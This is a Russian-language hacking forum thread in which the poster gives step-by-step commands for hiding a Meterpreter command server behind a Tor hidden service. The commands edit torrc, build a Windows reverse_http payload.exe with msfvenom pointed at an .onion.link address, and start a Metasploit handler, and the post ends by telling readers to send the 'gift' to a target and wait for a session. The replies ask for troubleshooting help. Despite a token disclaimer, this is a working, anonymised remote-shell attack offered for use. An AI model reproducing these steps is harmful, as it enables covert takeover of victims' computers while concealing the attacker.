Статья Meterpreter через TOR [Простое решение]

Отказ от ответственности: Эта статья написана только для образовательных целей. Автор или издатель не публиковали эту статью для вредоносных целей. Если читатели хотели бы загрузить эту программу, чтобы использовать её для личной выгоды, то автор и издатель не должны нести ответственность за любой причиненный вред или ущерб.
Уголовно наказуемо! Статья 272.

Доброго времени суток форумчане!
Эта тема для тех кто искал но не находил решение вопроса - а как же пустить сессию meterpreter через сеть тор
Требования:
  • Metasploit
  • tor (Expert Bundle)
  • Созданный сайт в сети tor
  • Не много терпения и капельку мозгов
Устанавливаем Metasploit если его еще нету!
Скачиваем tor:
Bash:
apt install tor
Заходим в файл конфигурации "torrc":
Bash:
nano /etc/tor/torrc
Находим и раскомментируем строчки до вида:
Код:
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:9999
Перезапускаем сервис:
Bash:
sudo service tor restart
Узнаем полученый домен:
Bash:
sudo cat /var/lib/tor/hidden_service/hostname
Я думаю что для многих понятно что этим мы создали свой сайт в сети tor.
Теперь перейдем к metasploit'у.
Создадим наш вредоносный полезный файл:
Bash:
msfvenom -p windows/meterpreter/reverse_http LHOST=*******************.onion.link LPORT=80 -o payload.exe -f exe
Вместо звёздочек вводим полученную нами .onion ссылку.
Важно что бы ссылка заканчивалась на .onion.link
.onion.link - этот сайт перебрасывает вас в сеть тор без дополнительного ПО
Запустим слушателя:
Bash:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.1 (Не обязательно что будет такой же )
set LPORT 9999
exploit
Отправляем наш подарок на машину и ждем сессию.
Надеюсь что тема хоть кому нибудь пригодиться)
 
Последнее редактирование модератором:
Почему нету файла hostname. Да даже сама папка hidden_service не создается...
 
Здравствуйте, ребята все сделал как написанно, включил апаче, но когда подставлял я .to мне всегда выбивал следующую ошибку


Gateway Error - Site may be down or inaccessible. Try again later.

в чем может быть ошибка?
 
привет эта тема актуальна еще? если да то у меня есть вопрос... допустим мне пришлось переустанавливать операционку, возможно ли вернуть тот же урл в даркнете?
Ответ с запазданием. Нужно было сохранить PGP подпись лежит она тут: /var/lib/tor/hidden_service/ еще права незабудь посмотреть, вроде принадлежит пользвателю tor. Хотя всегда можно сделать rwx
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Курс AD